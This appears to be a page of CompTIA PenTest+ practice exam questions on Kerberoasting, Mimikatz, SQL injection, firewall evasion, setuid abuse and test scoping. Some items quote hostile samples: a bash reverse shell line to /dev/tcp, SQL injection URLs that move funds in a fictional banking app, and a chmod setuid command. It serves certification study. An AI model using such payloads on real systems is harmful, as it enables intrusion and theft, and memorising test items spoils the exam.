CompTIA (PT0-001) Exam Questions And Answers page 17
When would a tester perform a Kerberoasting attack?
Single Choice
In which of the following scenarios would a tester perform a Kerberoasting attack?
The tester needs to retrieve the SAM database and crack the password hashes.
The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
Attacks and Exploits
Penetration Testing Tools
Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount= OR 1=1 AND select username from testbank.custinfo where username like Joe "&amount=200
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount= OR 1=1 AND select username from testbank.custinfo where username like Joe &amount=200
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount= OR 1=1 AND select username from testbank.custinfo where username like Joe "&amount=200
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount= AND 1=1 AND select username from testbank.custinfo where username like Joe "&amount=200
Attacks and Exploits
Penetration Testing Tools
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
LSASS
SAM database
Active Directory
Registry
Attacks and Exploits
Penetration Testing Tools
Joe, a penetration tester, was able to exploit a web application behind a firewall. He is trying to get a reverse shell back to his machine, but the firewall blocks the outgoing traffic. Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?
SMB
SMTP
FTP
DNS
Attacks and Exploits
Penetration Testing Tools
The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
Kernel vulnerabilities
Sticky bits
Unquoted service path
Misconfigured sudo
Attacks and Exploits
Penetration Testing Tools
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
Performs a port scan.
Grabs the web server's banner.
Redirects a TTY to a remote system.
Removes error logs for the supplied IP.
Attacks and Exploits
Penetration Testing Tools
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Choose two.)
Storage access
Limited network access
Misconfigured DHCP server
Incorrect VLAN scanned
Network access controls
Planning and Scoping
Information Gathering and Vulnerability Identification
The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?
min-rate
max-length
host-timeout
max-rate
Attacks and Exploits
Penetration Testing Tools
When calculating the sales price of a penetration test to a client, which of the following is the MOST important aspect to understand?
The operating cost
The client's budget
The required scope of work
The non-disclosure agreement
Penetration Testing Tools
Reporting and Communication
When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?
Development of custom zero-day exploits and tools
Leveraging the dark net for non-attribution
Tenacity and efficacy of social engineering attacks
Amount of bandwidth available for DoS attacks
Planning and Scoping
Attacks and Exploits